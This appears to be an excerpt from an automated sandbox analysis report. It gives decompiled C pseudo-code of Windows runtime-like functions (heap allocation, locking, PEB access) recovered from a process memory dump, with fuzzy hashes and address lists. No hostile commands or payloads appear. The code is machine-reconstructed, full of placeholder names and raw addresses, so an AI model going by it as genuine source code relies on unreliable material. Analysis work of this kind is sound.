Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 83a89d4619e5d5233c3834b3834c72730bb6c9c72fec8e9897eb04bba6a8ba53 Instruction ID: 26584fc0ee428c2cd3aa8ca308801c813452432c658453b2bee066cccd4cf207 Opcode Fuzzy Hash: 83a89d4619e5d5233c3834b3834c72730bb6c9c72fec8e9897eb04bba6a8ba53 Instruction Fuzzy Hash: EF31BEF1740305DFC729CB09EC84F59BBF9FB88710F944969E2A587284D3729A81CB91

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 97%

E010E61A0(signed int* __ecx) { intOrPtr _v8; char _v12; intOrPtr* _v16; intOrPtr _v20; intOrPtr _t30; intOrPtr _t31; void* _t32; intOrPtr _t33; intOrPtr _t37; intOrPtr _t49; signed int _t51; intOrPtr _t52; signed int _t54; void* _t59; signed int* _t61; intOrPtr* _t64; _t61 = __ecx; _v12 = 0; _t30 = *((intOrPtr*)( *[fs:0x30] + 0x1e8)); _v16 = __ecx; _v8 = 0; if(_t30 == 0) { L6: _t31 = 0; L7: return _t31; } _t32 = _t30 + 0x5d8; if(_t32 == 0) { goto L6; } _t59 = _t32 + 0x30; if( *((intOrPtr*)(_t32 + 0x30)) == 0) { goto L6; } if(__ecx != 0) { *((intOrPtr*)(__ecx)) = 0; *((intOrPtr*)(__ecx + 4)) = 0; } if( *((intOrPtr*)(_t32 + 0xc)) != 0) { _t51 = *(_t32 + 0x10); _t33 = _t32 + 0x10; _v20 = _t33; _t54 = *(_t33 + 4); if((_t51 | _t54) == 0) { _t37 = E010E5E50(0x10967cc, 0, 0, &_v12); if(_t37 != 0) { goto L6; } _t52 = _v8; asm("lock cmpxchg8b [esi]"); _t64 = _v16; _t49 = _t37; _v20 = 0; if(_t37 == 0) { if(_t64 != 0) { *_t64 = _v12; *((intOrPtr*)(_t64 + 4)) = _t52; } E01189D2E(_t59, 0, _v12, _v8, *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff, *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c))); _t31 = 1; goto L7; } E010BF7C0(_t52, _v12, _t52, 0); if(_t64 != 0) { *_t64 = _t49; *((intOrPtr*)(_t64 + 4)) = _v20; } L12: _t31 = 1; goto L7; } if(_t61 != 0) { *_t61 = _t51; _t61[1] = _t54; } goto L12; } else { goto L6; } } 0x010e61b3 0x010e61b5 0x010e61bd 0x010e61c3 0x010e61c7 0x010e61d2 0x010e61ff 0x010e61ff 0x010e6201 0x010e6207 0x010e6207 0x010e61d4 0x010e61d9 0x00000000 0x00000000 0x010e61df 0x010e61e2 0x00000000 0x00000000 0x010e61e6 0x010e61e8 0x010e61ee 0x010e61ee 0x010e61f9 0x0112762f 0x01127632 0x01127635 0x01127639 0x01127640 0x0112766e 0x01127675 0x00000000 0x00000000 0x01127681 0x01127689 0x0112768d 0x01127691 0x01127695 0x01127699 0x011276af 0x011276b5 0x011276b7 0x011276b7 0x011276d7 0x011276dc 0x00000000 0x011276dc 0x011276a2 0x011276a9 0x01127651 0x01127653 0x01127653 0x01127656 0x01127656 0x00000000 0x01127656 0x01127644 0x01127646 0x01127648 0x01127648 0x00000000 0x00000000 0x00000000 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 5d04c5a56652f960dec7ae9c4cb63d3fed126897391a496f3199f6f07f511b58 Instruction ID: dfd8dccf45f8870830d96e319c0d6f98bd2e27c72aeb7b84f8bd043c257c4564 Opcode Fuzzy Hash: 5d04c5a56652f960dec7ae9c4cb63d3fed126897391a496f3199f6f07f511b58 Instruction Fuzzy Hash: C7316D716057118FE364CF1ED844B2ABBE5FFA8B00F0549ADE99497391E771D804CB91

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%

E010BAA16(signed short* __ecx) { signed int _v8; intOrPtr _v12; signed short _v16; intOrPtr _v20; signed short _v24; signed short _v28; void* _v32; void* __ebx; void* __edi; void* __esi; intOrPtr _t25; signed short _t38; signed short* _t42; signed int _t44; signed short* _t52; signed short _t53; signed int _t54; _v8 = *0x11ad360 ^ _t54; _t42 = __ecx; _t44 = *__ecx & 0x0000ffff; _t52 = &(__ecx[2]); _t51 = _t44 + 2; if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) { L4: _t25 = *0x11a7b9c; // 0x0 _t53 = L010D4620(_t44, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51); __eflags = _t53; if(_t53 == 0) { L3: return E010FB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53); } else { E010FF3E0(_t53, *_t52, *_t42 & 0x0000ffff); *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0; L2: _t51 = 4; if(L010C6C59(_t53, _t51, _t58) != 0) { _t28 = E010E5E50(0x109c338, 0, 0, &_v32); __eflags = _t28; if(_t28 == 0) { _t38 = ( *_t42 & 0x0000ffff) + 2; __eflags = _t38; _v24 = _t53; _v16 = _t38; _v20 = 0; _v12 = 0; E010EB230(_v32, _v28, 0x109c2d8, 1, &_v24); _t28 = E010BF7A0(_v32, _v28); } __eflags = _t53 - *_t52; if(_t53 != *_t52) { _t28 = L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53); } } goto L3; } } _t53 = *_t52; _t44 = _t44 >> 1; _t58 = *((intOrPtr*)(_t53 + _t44 * 2)); if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) { goto L4; } goto L2; } 0x010baa25 0x010baa29 0x010baa2d 0x010baa30 0x010baa37 0x010baa3c 0x01114458 0x01114458 0x01114472 0x01114474 0x01114476 0x010baa64 0x010baa74 0x0111447c 0x01114483 0x01114492 0x010baa52 0x010baa54 0x010baa5e 0x011144a8 0x011144ad 0x011144af 0x011144b6 0x011144b6 0x011144b9 0x011144bc 0x011144cd 0x011144d3 0x011144d6 0x011144e1 0x011144e1 0x011144e6 0x011144e8 0x011144fb 0x011144fb 0x011144e8 0x00000000 0x010baa5e 0x01114476 0x010baa42 0x010baa46 0x010baa48 0x010baa4c 0x00000000 0x00000000 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 5ebeaf092fd417aad5feecb0e49f9af3b4e6492efc904126bea3a7188ce7fbca Instruction ID: cc7f962890e1d68249187e95d068d9a337e25eeab8863ed0db66463df5dcb0ab Opcode Fuzzy Hash: 5ebeaf092fd417aad5feecb0e49f9af3b4e6492efc904126bea3a7188ce7fbca Instruction Fuzzy Hash: E131E372A0021AEBDF159F68CD81ABFB7B8FF04700B414469F941EB640E7749910DBA0

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%

E010F4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) { signed int _v8; signed int* _v12; char _v13; signed int _v16; char _v21; signed int* _v24; void* __ebx; void* __edi; void* __esi; signed int _t29; signed int* _t32; signed int* _t41; signed int _t42; void* _t43; intOrPtr* _t51; void* _t52; signed int _t53; signed int _t58; void* _t59; signed int _t60; signed int _t62; _t49 = __edx; _t62 = (_t60 & 0xfffffff8) - 0xc; _t26 = *0x11ad360 ^ _t62; _v8 = *0x11ad360 ^ _t62; _t41 = __ecx; _t51 = __edx; _v12 = __ecx; if(_a4 == 0) { if(_a8 != 0) { goto L1; } _v13 = 1; E010D2280(_t26, 0x11a8608); _t58 = *_t41; if(_t58 == 0) { L11: E010CFFB0(_t41, _t51, 0x11a8608); L2: *0x11ab1e0(_a4, _a8); _t42 = *_t51(); if(_t42 == 0) { _t29 = 0; L5: _pop(_t52); _pop(_t59); _pop(_t43); return E010FB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59); } *((intOrPtr*)(_t42 + 0x34)) = 1; if(_v21 != 0) { _t53 = 0; E010D2280(_t28, 0x11a8608); _t32 = _v24; if( *_t32 == _t58) { *_t32 = _t42; *((intOrPtr*)(_t42 + 0x34)) = *((intOrPtr*)(_t42 + 0x34)) + 1; if(_t58 != 0) { *(_t58 + 0x34) = *(_t58 + 0x34) - 1; asm("sbb edi, edi"); _t53 = !( ~( *(_t58 + 0x34))) & _t58; } } E010CFFB0(_t42, _t53, 0x11a8608); if(_t53 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53); } } _t29 = _t42; goto L5; } if( *((char*)(_t58 + 0x40)) != 0) { L10: *(_t58 + 0x34) = *(_t58 + 0x34) + 1; E010CFFB0(_t41, _t51, 0x11a8608); _t29 = _t58; goto L5; } _t49 = *((intOrPtr*)( *[fs:0x30] + 0x10)); if( *((intOrPtr*)(_t58 + 0x38)) != *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) { goto L11; } goto L10; } L1: _v13 = 0; _t58 = 0; goto L2; } 0x010f4a2c 0x010f4a34 0x010f4a3c 0x010f4a3e 0x010f4a48 0x010f4a4b 0x010f4a4d 0x010f4a51 0x010f4a9c 0x00000000 0x00000000 0x010f4aa3 0x010f4aa8 0x010f4aad 0x010f4ab1 0x010f4ade 0x010f4ae3 0x010f4a5a 0x010f4a62 0x010f4a6a 0x010f4a6e 0x0112f203 0x010f4a84 0x010f4a88 0x010f4a89 0x010f4a8a 0x010f4a95 0x010f4a95 0x010f4a79 0x010f4a80 0x010f4af2 0x010f4af4 0x010f4af9 0x010f4aff 0x010f4b01 0x010f4b03 0x010f4b08 0x0112f20a 0x0112f212 0x0112f216 0x0112f216 0x010f4b08 0x010f4b13 0x010f4b1a 0x0112f229 0x0112f229 0x010f4b1a 0x010f4a82 0x00000000 0x010f4a82 0x010f4ab7 0x010f4acd 0x010f4acd 0x010f4ad5 0x010f4ada 0x00000000 0x010f4ada 0x010f4ac2 0x010f4acb 0x00000000 0x00000000 0x00000000 0x010f4acb 0x010f4a53 0x010f4a53 0x010f4a58 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: adf2d9a994e97a8dad664a5b690e4be3127edb96b730e4b150e5fe5038252300 Instruction ID: 1e0f5306be53ee03f261e7c5d359428afcfa55efe1e02342ff53789df598d9db Opcode Fuzzy Hash: adf2d9a994e97a8dad664a5b690e4be3127edb96b730e4b150e5fe5038252300 Instruction Fuzzy Hash: 403124322057529BD761DF18C942B2BBBF5FF81B10F44446DEA9687A41C770D849CB86

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%

E010F8EC7(void* __ecx, void* __edx) { signed int _v8; intOrPtr _v16; intOrPtr _v20; intOrPtr _v24; char* _v28; intOrPtr _v32; intOrPtr _v36; intOrPtr _v40; signed int* _v44; intOrPtr _v48; intOrPtr _v52; intOrPtr _v56; signed int* _v60; intOrPtr _v64; intOrPtr _v68; intOrPtr _v72; char* _v76; intOrPtr _v80; signed int _v84; intOrPtr _v88; intOrPtr _v92; intOrPtr _v96; intOrPtr _v100; intOrPtr _v104; signed int* _v108; char _v140; signed int _v144; signed int _v148; intOrPtr _v152; char _v156; intOrPtr _v160; char _v164; void* __ebx; void* __edi; void* __esi; void* _t67; intOrPtr _t70; void* _t71; void* _t72; signed int _t73; _t69 = __edx; _v8 = *0x11ad360 ^ _t73; _t48 = *[fs:0x30]; _t72 = __edx; _t71 = __ecx; if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) { _t48 = E010E4E70(0x11a86e4, 0x10f9490, 0, 0); if( *0x11a53e8 > 5 && E010F8F33(0x11a53e8, 0, 0x2000) != 0) { _v156 = *((intOrPtr*)(_t71 + 0x44)); _v144 = *(_t72 + 0x44) & 0x0000ffff; _v148 = *(_t72 + 0x46) & 0x0000ffff; _v164 = *((intOrPtr*)(_t72 + 0x58)); _v108 = &_v84; _v92 = *((intOrPtr*)(_t71 + 0x28)); _v84 = *(_t71 + 0x24) & 0x0000ffff; _v76 = &_v156; _t70 = 8; _v60 = &_v144; _t67 = 4; _v44 = &_v148; _v152 = 0; _v160 = 0; _v104 = 0; _v100 = 2; _v96 = 0; _v88 = 0; _v80 = 0; _v72 = 0; _v68 = _t70; _v64 = 0; _v56 = 0; _v52 = 0x11a53e8; _v48 = 0; _v40 = 0; _v36 = 0x11a53e8; _v32 = 0; _v28 = &_v164; _v24 = 0; _v20 = _t70; _v16 = 0; _t69 = 0x109bc46; _t48 = E01137B9C(0x11a53e8, 0x109bc46, _t67, 0x11a53e8, _t70, &_v140); } } return E010FB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72); } 0x010f8ec7 0x010f8ed9 0x010f8edc 0x010f8ee6 0x010f8ee9 0x010f8eee 0x010f8efc 0x010f8f08 0x01131349 0x01131353 0x0113135d 0x01131366 0x0113136f 0x01131375 0x0113137c 0x01131385 0x01131390 0x01131391 0x0113139c 0x0113139d 0x011313a6 0x011313ac 0x011313b2 0x011313b5 0x011313bc 0x011313bf 0x011313c2 0x011313c5 0x011313c8 0x011313cb 0x011313ce 0x011313d1 0x011313d4 0x011313d7 0x011313da 0x011313dd 0x011313e0 0x011313e3 0x011313e6 0x011313e9 0x011313f6 0x01131400 0x01131400 0x010f8f08 0x010f8f32

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 409a039f163663610ba6795e4ee04c186d28f2eb08f697cfa6d8fe975031f775 Instruction ID: fd6434a45705d803bceab30ac94cbbfaa070d72fdf2068dd1a8da72d871c164c Opcode Fuzzy Hash: 409a039f163663610ba6795e4ee04c186d28f2eb08f697cfa6d8fe975031f775 Instruction Fuzzy Hash: AD4190B1D04218AEDB24CFAAD981AEDFBF5FB48310F5081AEE649A7640D7705A84CF50

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%

E010EE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) { intOrPtr* _v0; signed char _v4; signed int _v8; void* __ecx; void* __ebp; void* _t37; intOrPtr _t38; signed int _t44; signed char _t52; void* _t54; intOrPtr* _t56; void* _t58; char* _t59; signed int _t62; _t58 = __edx; _push(0); _push(4); _push( &_v8); _push(0x24); _push(0xffffffff); if(E010F9670() < 0) { L0110DF30(_t54, _t58, _t35); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); _push(_t54); _t52 = _v4; if(_t52 > 8) { _t37 = 0xc0000078; } else { _t38 = *0x11a7b9c; // 0x0 _t62 = _t52 & 0x000000ff; _t59 = L010D4620(8 + _t62 * 4, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4); if(_t59 == 0) { _t37 = 0xc0000017; } else { _t56 = _v0; *(_t59 + 1) = _t52; *_t59 = 1; *((intOrPtr*)(_t59 + 2)) = *_t56; *((short*)(_t59 + 6)) = *((intOrPtr*)(_t56 + 4)); _t44 = _t62 - 1; if(_t44 <= 7) { switch( *((intOrPtr*)(_t44 * 4 + &M010EE810))) { case 0: L6: *((intOrPtr*)(_t59 + 8)) = _a8; goto L7; case 1: L13: *((intOrPtr*)(__edx + 0xc)) = _a12; goto L6; case 2: L12: *((intOrPtr*)(__edx + 0x10)) = _a16; goto L13; case 3: L11: *((intOrPtr*)(__edx + 0x14)) = _a20; goto L12; case 4: L10: *((intOrPtr*)(__edx + 0x18)) = _a24; goto L11; case 5: L9: *((intOrPtr*)(__edx + 0x1c)) = _a28; goto L10; case 6: L17: *((intOrPtr*)(__edx + 0x20)) = _a32; goto L9; case 7: *((intOrPtr*)(__edx + 0x24)) = _a36; goto L17; } } L7: *_a40 = _t59; _t37 = 0; } } return _t37; } else { _push(0x20); asm("ror eax, cl"); return _a4 ^ _v8; } } 0x010ee730 0x010ee736 0x010ee738 0x010ee73d 0x010ee73e 0x010ee740 0x010ee749 0x010ee765 0x010ee76a 0x010ee76b 0x010ee76c 0x010ee76d 0x010ee76e 0x010ee76f 0x010ee775 0x010ee777 0x010ee77e 0x0112b675 0x010ee784 0x010ee784 0x010ee789 0x010ee7a8 0x010ee7ac 0x010ee807 0x010ee7ae 0x010ee7ae 0x010ee7b1 0x010ee7b4 0x010ee7b9 0x010ee7c0 0x010ee7c4 0x010ee7ca 0x010ee7cc 0x00000000 0x010ee7d3 0x010ee7d6 0x00000000 0x00000000 0x010ee7ff 0x010ee802 0x00000000 0x00000000 0x010ee7f9 0x010ee7fc 0x00000000 0x00000000 0x010ee7f3 0x010ee7f6 0x00000000 0x00000000 0x010ee7ed 0x010ee7f0 0x00000000 0x00000000 0x010ee7e7 0x010ee7ea 0x00000000 0x00000000 0x0112b685 0x0112b688 0x00000000 0x00000000 0x0112b682 0x00000000 0x00000000 0x010ee7cc 0x010ee7d9 0x010ee7dc 0x010ee7de 0x010ee7de 0x010ee7ac 0x010ee7e4 0x010ee74b 0x010ee751 0x010ee759 0x010ee761 0x010ee761

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 975f0e96a73cc593577bb7a40c19b535f02e817af5bb587ce21a71904ade01c8 Instruction ID: d352a8efe966268b05606ce44eac71e39c27b4a459eb3ff3ffb0197196a735d3 Opcode Fuzzy Hash: 975f0e96a73cc593577bb7a40c19b535f02e817af5bb587ce21a71904ade01c8 Instruction Fuzzy Hash: A631BD75A44209EFD744CF59C845B8ABBE4FB09314F1482AAFA88CB341D631EC80CBA1

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%

E010EBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) { intOrPtr _v8; intOrPtr _v12; void* __ebx; void* __edi; intOrPtr _t22; intOrPtr* _t41; intOrPtr _t51; _t51 = *0x11a6100; // 0x1a _v12 = __edx; _v8 = __ecx; if(_t51 >= 0x800) { L12: return 0; } else { goto L1; } while(1) { L1: _t22 = _t51; asm("lock cmpxchg [ecx], edx"); if(_t51 == _t22) { break; } _t51 = _t22; if(_t22 < 0x800) { continue; } goto L12; } E010D2280(0xd, 0x583f1a0); _t41 = *0x11a60f8; // 0x0 if(_t41 != 0) { *0x11a60f8 = *_t41; *0x11a60fc = *0x11a60fc + 0xffff; } E010CFFB0(_t41, 0x800, 0x583f1a0); if(_t41 != 0) { L6: asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); *((intOrPtr*)(_t41 + 0x1c)) = _v12; *((intOrPtr*)(_t41 + 0x20)) = _a4; *(_t41 + 0x36) = *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff; do { asm("lock xadd [0x11a60f0], ax"); *((short*)(_t41 + 0x34)) = 1; } while (1 == 0); goto L8; } else { _t41 = L010D4620(0x11a6100, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0); if(_t41 == 0) { L11: asm("lock dec dword [0x11a6100]"); L8: return _t41; } *(_t41 + 0x24) = *(_t41 + 0x24) & 0x00000000; *(_t41 + 0x28) = *(_t41 + 0x28) & 0x00000000; if(_t41 == 0) { goto L11; } goto L6; } } 0x010ebc36 0x010ebc42 0x010ebc45 0x010ebc4a 0x010ebd35 0x00000000 0x00000000 0x00000000 0x00000000 0x010ebc50 0x010ebc50 0x010ebc58 0x010ebc5a 0x010ebc60 0x00000000 0x00000000 0x0112a4f2 0x0112a4f6 0x00000000 0x00000000 0x00000000 0x0112a4fc 0x010ebc79 0x010ebc7e 0x010ebc86 0x010ebd16 0x010ebd20 0x010ebd20 0x010ebc8d 0x010ebc94 0x010ebcbd 0x010ebcca 0x010ebccb 0x010ebccc 0x010ebccd 0x010ebcce 0x010ebcd4 0x010ebcea 0x010ebcee 0x010ebcf2 0x010ebd00 0x010ebd04 0x00000000 0x010ebc96 0x010ebcab 0x010ebcaf 0x010ebd2c 0x010ebd2c 0x010ebd09 0x00000000 0x010ebd09 0x010ebcb1 0x010ebcb5 0x010ebcbb 0x00000000 0x00000000 0x00000000 0x010ebcbb

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: db501d3a408fbc9a65a67d47c072a809e33c6d89b4f85a4336ff67c216110aa1 Instruction ID: 029816e14210fb2031dee16d8269c020b0314c345ca347f82f0b0e3738396e12 Opcode Fuzzy Hash: db501d3a408fbc9a65a67d47c072a809e33c6d89b4f85a4336ff67c216110aa1 Instruction Fuzzy Hash: 913131326046069FCB21EF59C4807AA7BF4FF18310F490078ED95DB205E731D985CB81

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%

E010B9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) { signed int _t53; signed int _t56; signed int* _t60; signed int _t63; signed int _t66; signed int _t69; void* _t70; intOrPtr* _t72; void* _t78; void* _t79; signed int _t80; intOrPtr _t82; void* _t85; void* _t88; void* _t89; _t84 = __esi; _t70 = __ecx; _t68 = __ebx; _push(0x2c); _push(0x118f6e8); E0110D0E8(__ebx, __edi, __esi); *((char*)(_t85 - 0x1d)) = 0; _t82 = *((intOrPtr*)(_t85 + 8)); if(_t82 == 0) { L4: if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) { E011888F5(_t68, _t70, _t78, _t82, _t84, __eflags); } L5: return E0110D130(_t68, _t82, _t84); } _t88 = _t82 - *0x11a86c0; // 0x5e07b0 if(_t88 == 0) { goto L4; } _t89 = _t82 - *0x11a86b8; // 0x0 if(_t89 == 0 || *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) { goto L4; } else { E010D2280(_t82 + 0xe0, _t82 + 0xe0); *(_t85 - 4) = *(_t85 - 4) & 0x00000000; __eflags = *((char*)(_t82 + 0xe5)); if(__eflags != 0) { E011888F5(__ebx, _t70, _t78, _t82, __esi, __eflags); goto L12; } else { __eflags = *((char*)(_t82 + 0xe4)); if( *((char*)(_t82 + 0xe4)) == 0) { *((char*)(_t82 + 0xe4)) = 1; _push(_t82); _push( *((intOrPtr*)(_t82 + 0x24))); E010FAFD0(); } while(1) { _t60 = _t82 + 8; *(_t85 - 0x2c) = _t60; _t68 = *_t60; _t80 = _t60[1]; *(_t85 - 0x28) = _t68; *(_t85 - 0x24) = _t80; while(1) { L10: __eflags = _t80; if(_t80 == 0) { break; } _t84 = _t68; *(_t85 - 0x30) = _t80; *(_t85 - 0x24) = _t80 - 1; asm("lock cmpxchg8b [edi]"); _t68 = _t84; *(_t85 - 0x28) = _t68; *(_t85 - 0x24) = _t80; __eflags = _t68 - _t84; _t82 = *((intOrPtr*)(_t85 + 8)); if(_t68 != _t84) { continue; } __eflags = _t80 - *(_t85 - 0x30); if(_t80 != *(_t85 - 0x30)) { continue; } __eflags = _t80; if(_t80 == 0) { break; } _t63 = 0; *(_t85 - 0x34) = 0; _t84 = 0; __eflags = 0; while(1) { *(_t85 - 0x3c) = _t84; __eflags = _t84 - 3; if(_t84 >= 3) { break; } __eflags = _t63; if(_t63 != 0) { L40: _t84 = *_t63; __eflags = _t84; if(_t84 != 0) { _t84 = *(_t84 + 4); __eflags = _t84; if(_t84 != 0) { *0x11ab1e0(_t63, _t82); *_t84(); } } do { _t60 = _t82 + 8; *(_t85 - 0x2c) = _t60; _t68 = *_t60; _t80 = _t60[1]; *(_t85 - 0x28) = _t68; *(_t85 - 0x24) = _t80; goto L10; } while (_t63 == 0); goto L40; } _t69 = 0; __eflags = 0; while(1) { *(_t85 - 0x38) = _t69; __eflags = _t69 - *0x11a84c0; if(_t69 >= *0x11a84c0) { break; } __eflags = _t63; if(_t63 != 0) { break; } _t66 = E01189063(_t69 * 0xc + *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82); __eflags = _t66; if(_t66 == 0) { _t63 = 0; __eflags = 0; } else { _t63 = _t66 + 0xfffffff4; } *(_t85 - 0x34) = _t63; _t69 = _t69 + 1; } _t84 = _t84 + 1; } __eflags = _t63; } *((intOrPtr*)(_t82 + 0xf4)) = *((intOrPtr*)(_t85 + 4)); *((char*)(_t82 + 0xe5)) = 1; *((char*)(_t85 - 0x1d)) = 1; L12: *(_t85 - 4) = 0xfffffffe; E010B922A(_t82); _t53 = E010D7D50(); __eflags = _t53; if(_t53 != 0) { _t56 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; } else { _t56 = 0x7ffe0386; } __eflags = *_t56; if( *_t56 != 0) { _t56 = E01188B58(_t82); } __eflags = *((char*)(_t85 - 0x1d)); if( *((char*)(_t85 - 0x1d)) != 0) { __eflags = _t82 - *0x11a86c0; // 0x5e07b0 if(__eflags != 0) { __eflags = _t82 - *0x11a86b8; // 0x0 if(__eflags == 0) { _t79 = 0x11a86bc; _t72 = 0x11a86b8; goto L18; } __eflags = _t56 | 0xffffffff; asm("lock xadd [edi], eax"); if(__eflags == 0) { E010B9240(_t68, _t82, _t82, _t84, __eflags); } } else { _t79 = 0x11a86c4; _t72 = 0x11a86c0; L18: E010E9B82(_t68, _t72, _t79, _t82, _t84, __eflags); } } goto L5; } } } } 0x010b9100 0x010b9100 0x010b9100 0x010b9100 0x010b9102 0x010b9107 0x010b910c 0x010b9110 0x010b9115 0x010b9136 0x010b9143 0x011137e4 0x011137e4 0x010b9149 0x010b914e 0x010b914e 0x010b9117 0x010b911d 0x00000000 0x00000000 0x010b911f 0x010b9125 0x00000000 0x010b9151 0x010b9158 0x010b915d 0x010b9161 0x010b9168 0x01113715 0x00000000 0x010b916e 0x010b916e 0x010b9175 0x010b9177 0x010b917e 0x010b917f 0x010b9182 0x010b9182 0x010b9187 0x010b9187 0x010b918a 0x010b918d 0x010b918f 0x010b9192 0x010b9195 0x010b9198 0x010b9198 0x010b9198 0x010b919a 0x00000000 0x00000000 0x0111371f 0x01113721 0x01113727 0x0111372f 0x01113733 0x01113735 0x01113738 0x0111373b 0x0111373d 0x01113740 0x00000000 0x00000000 0x01113746 0x01113749 0x00000000 0x00000000 0x0111374f 0x01113751 0x00000000 0x00000000 0x01113757 0x01113759 0x0111375c 0x0111375c 0x0111375e 0x0111375e 0x01113761 0x01113764 0x00000000 0x00000000 0x01113766 0x01113768 0x011137a3 0x011137a3 0x011137a5 0x011137a7 0x011137ad 0x011137b0 0x011137b2 0x011137bc 0x011137c2 0x011137c2 0x011137b2 0x010b9187 0x010b9187 0x010b918a 0x010b918d 0x010b918f 0x010b9192 0x010b9195 0x00000000 0x010b9195 0x00000000 0x010b9187 0x0111376a 0x0111376a 0x0111376c 0x0111376c 0x0111376f 0x01113775 0x00000000 0x00000000 0x01113777 0x01113779 0x00000000 0x00000000 0x01113782 0x01113787 0x01113789 0x01113790 0x01113790 0x0111378b 0x0111378b 0x0111378b 0x01113792 0x01113795 0x01113795 0x01113798 0x01113798 0x0111379b 0x0111379b 0x010b91a3 0x010b91a9 0x010b91b0 0x010b91b4 0x010b91b4 0x010b91bb 0x010b91c0 0x010b91c5 0x010b91c7 0x011137da 0x010b91cd 0x010b91cd 0x010b91cd 0x010b91d2 0x010b91d5 0x010b9239 0x010b9239 0x010b91d7 0x010b91db 0x010b91e1 0x010b91e7 0x010b91fd 0x010b9203 0x010b921e 0x010b9223 0x00000000 0x010b9223 0x010b9205 0x010b9208 0x010b920c 0x010b9214 0x010b9214 0x010b91e9 0x010b91e9 0x010b91ee 0x010b91f3 0x010b91f3 0x010b91f3 0x010b91e7 0x00000000 0x010b91db 0x010b9187 0x010b9168

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 5ac3dbb573636c277abf9231b0b96c83cef6483f52fe7573771ea48e7b326011 Instruction ID: fa1806cebaa0a2967f81f0b2b3fe23ac05b38a09ea2938080924730f2452146d Opcode Fuzzy Hash: 5ac3dbb573636c277abf9231b0b96c83cef6483f52fe7573771ea48e7b326011 Instruction Fuzzy Hash: 5931C3B5A01645DFEB6ADF6CC0C87ECBBF1BB49318F58859DC65467241C330A980DB51
